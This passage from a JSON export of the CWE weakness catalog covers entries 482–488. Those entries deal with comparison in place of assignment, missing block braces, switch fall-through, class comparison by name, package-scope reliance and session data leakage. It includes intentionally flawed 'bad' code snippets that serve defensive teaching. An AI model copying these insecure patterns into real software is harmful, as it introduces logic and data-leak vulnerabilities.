confused.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This bug primarily originates from a typo."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":"Unexpected State","Note":"The assignment will not take place, which should cause obvious program execution problems."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Many IDEs and static analysis products will detect this problem."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"void called(int foo) {}int main() {}","xhtml:div":[{"#text":"foo==1;if (foo==1) System.out.println(\\"foo\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"called(2);return 0;","xhtml:br":["",""]}}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-103"},"Intro_Text":"The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SIZE 50int *tos, *p1, stack[SIZE];void push(int i) {}int pop(void) {}int main(int argc, char *argv[]) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"p1++;if(p1==(tos+SIZE)) {}*p1 == i;","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack overflow error message and exit"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(p1==tos) {}p1--;return *(p1+1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack underflow error message and exit"}},"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"tos = stack;p1 = stack;...return 0;","xhtml:br":["","","","","",""],"xhtml:i":["// initialize tos and p1 to point to the top of stack","// code to add and remove items from stack"]}}]}},"Body_Text":["The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable.","However, this expression uses the comparison operator \\"==\\" rather than the assignment operator \\"=\\". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Comparing instead of assigning"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"483":{"attr":{"@_ID":"483","@_Name":"Incorrect Block Delimitation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error.","Extended_Description":"In some languages, braces (or other delimiters) are optional for blocks. When the delimiter is omitted, it is possible to insert a logic error in which a statement is thought to be in a block but is not. In some cases, the logic error can have security implications.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic","Note":"This is a general logic error which will often lead to obviously-incorrect behaviors that are quickly noticed and fixed. In lightly tested or untested code, this error may be introduced it into a production environment and provide additional attack vectors by creating a control flow path leading to an unexpected state in the application. The consequences will depend on the types of behaviors that are being incorrectly executed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always use explicit block delimitation and use static-analysis technologies to enforce this practice."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, the programmer has indented the statements to call Do_X() and Do_Y(), as if the intention is that these functions are only called when the condition is true. However, because there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (condition==true)","xhtml:div":{"#text":"Do_X();Do_Y();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability."},{"Intro_Text":"In this example, the programmer has indented the Do_Y() statement as if the intention is that the function should be associated with the preceding conditional and should only be called when the condition is true. However, because Do_X() was called on the same line as the conditional and there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (condition==true) Do_X();","xhtml:div":{"#text":"Do_Y();","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"incorrect indentation of \\"goto\\" statement makes it more difficult to detect an incorrect goto (Apple\'s \\"goto fail\\")","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Incorrect block delimitation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Michael Koo and Paul Black","Contribution_Organization":"NIST","Contribution_Date":"2010-04-28","Contribution_Comment":"Correction to Demonstrative Examples"}}},"484":{"attr":{"@_ID":"484","@_Name":"Omitted Break Statement in Switch","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.","Extended_Description":"This can lead to critical code executing in situations where it should not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"This weakness can cause unintended logic to be executed and other unexpected application behavior."}},"Detection_Methods":{"Detection_Method":[{"Method":"White Box","Description":"Omission of a break statement might be intentional, in order to support fallthrough. Automated detection methods might therefore be erroneous. Semantic understanding of expected program behavior is required to interpret whether the code is correct."},{"Method":"Black Box","Description":"Since this weakness is associated with a code construct, it would be indistinguishable from other errors that produce the same behavior."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Omitting a break statement so that one may fall through is often indistinguishable from an error, and therefore should be avoided. If you need to use fall-through capabilities, make sure that you have clearly documented this within the switch statement, and ensure that you have examined all the logical possibilities."},{"Phase":"Implementation","Description":"The functionality of omitting a break statement could be clarified with an if statement. This method is much safer."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In both of these examples, a message is printed based on the month passed into the function:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void printMessage(int month){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch (month) {}println(\\" is a great month\\");","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 1: print(\\"January\\");case 2: print(\\"February\\");case 3: print(\\"March\\");case 4: print(\\"April\\");case 5: print(\\"May\\");case 6: print(\\"June\\");case 7: print(\\"July\\");case 8: print(\\"August\\");case 9: print(\\"September\\");case 10: print(\\"October\\");case 11: print(\\"November\\");case 12: print(\\"December\\");","xhtml:br":["","","","","","","","","","","",""]}},"xhtml:br":""}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void printMessage(int month){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch (month) {}printf(\\" is a great month\\");","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 1: printf(\\"January\\");case 2: printf(\\"February\\");case 3: printf(\\"March\\");case 4: printf(\\"April\\");case 5: printff(\\"May\\");case 6: printf(\\"June\\");case 7: printf(\\"July\\");case 8: printf(\\"August\\");case 9: printf(\\"September\\");case 10: printf(\\"October\\");case 11: printf(\\"November\\");case 12: printf(\\"December\\");","xhtml:br":["","","","","","","","","","","",""]}},"xhtml:br":""}}}}],"Body_Text":"Both examples do not use a break statement after each case, which leads to unintended fall-through behavior. For example, calling \\"printMessage(10)\\" will result in the text \\"OctoberNovemberDecember is a great month\\" being printed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Omitted break statement"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Switch Statements&#34;, Page 337"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Name, Other_Notes, Potential_Mitigations, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Omitted Break Statement","attr":{"@_Date":"2008-11-24"}}}},"486":{"attr":{"@_ID":"486","@_Name":"Comparison of Classes by Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.","Extended_Description":"If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1025","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If a program relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (inputClass.getClass().getName().equals(\\"TrustedClassName\\")) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["// Do something assuming you trust inputClass","// ..."]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"if (inputClass.getClass() == TrustedClass.class) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["// Do something assuming you trust inputClass","// ..."]}}}}],"Body_Text":"However, multiple classes can have the same name therefore comparing an object\'s class by name can allow untrusted classes of the same name as the trusted class to be use to execute unintended or incorrect code. To compare the class of an object to the intended class the getClass() method and the comparison operator \\"==\\" should be used to ensure the correct trusted class is used, as shown in the following example."},{"Intro_Text":"In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object\'s fields to determine if the objects are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class TrustedClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...@Overridepublic boolean equals(Object obj) {}...","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isEquals = false;if (obj.getClass().getName().equals(this.getClass().getName())) {}return isEquals;","xhtml:br":["","","","",""],"xhtml:i":"// first check to see if the object is of the same class","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (...) {}","xhtml:br":["","",""],"xhtml:i":"// then compare object fields","xhtml:div":{"#text":"isEquals = true;","attr":{"@_style":"margin-left:10px;"}}}}}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean equals(Object obj) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (obj.getClass() == this.getClass()) {}...","xhtml:br":["","","","",""],"xhtml:i":"// first check to see if the object is of the same class","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":"However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example using the name of the class to compare the class of objects can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator \\"==\\" should be used to ensure the correct trusted class is used, as shown in the following example."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Comparing Classes by Name"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Comparing classes by name"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ09-J","Entry_Name":"Compare classes and not class names"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Comparing Classes by Name","attr":{"@_Date":"2008-04-11"}}}},"487":{"attr":{"@_ID":"487","@_Name":"Reliance on Package-level Scope","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Java packages are not inherently closed; therefore, relying on them for code security is not a good practice.","Extended_Description":"The purpose of package scope is to prevent accidental access by other parts of a program. This is an ease-of-software-development feature but not a security feature.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Any data in a Java package can be accessed outside of the Java framework if the package is distributed."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The data in a Java class can be modified by anyone outside of the Java framework if the packages is distributed."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Data should be private static and final whenever possible. This will assure that your code is protected by instantiating early, preventing access and tampering."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"package math;public class Lebesgue implements Integration{}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final Static String youAreHidingThisFunction(functionToIntegrate){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return ...;","xhtml:br":""}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Relying on package-level scope"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET04-J","Entry_Name":"Do not increase the accessibility of overridden or hidden methods"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"}],"Previous_Entry_Name":{"#text":"Relying on Package-level Scope","attr":{"@_Date":"2008-04-11"}}}},"488":{"attr":{"@_ID":"488","@_Name":"Exposure of Data Element to Wrong Session","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.","Extended_Description":{"xhtml:p":["Data can \\"bleed\\" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool.","In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user\'s data. In other words, storing user data in Servlet member fields introduces a data access race condition."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect the application\'s sessions from information leakage. Make sure that a session\'s data is not used or visible by other sessions."},{"Phase":"Testing","Description":"Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field)."},{"Phase":"Architecture and Design","Description":"In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class GuestBook extends HttpServlet {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String name;protected void doPost (HttpServletRequest req, HttpServletResponse res) {}","xhtml:br":["",""],"xhtml:div":{"#text":"name = req.getParameter(\\"name\\");...out.println(name + \\", thanks for visiting!\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Body_Text":"While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way: Thread 1: assign \\"Dick\\" to name Thread 2: assign \\"Jane\\" to name Thread 1: print \\"Jane, thanks for visiting!\\" Thread 2: print \\"Jane, thanks for visiting!\\" Thereby showing the first user the second user\'s name."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Data Leaking Between Users"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 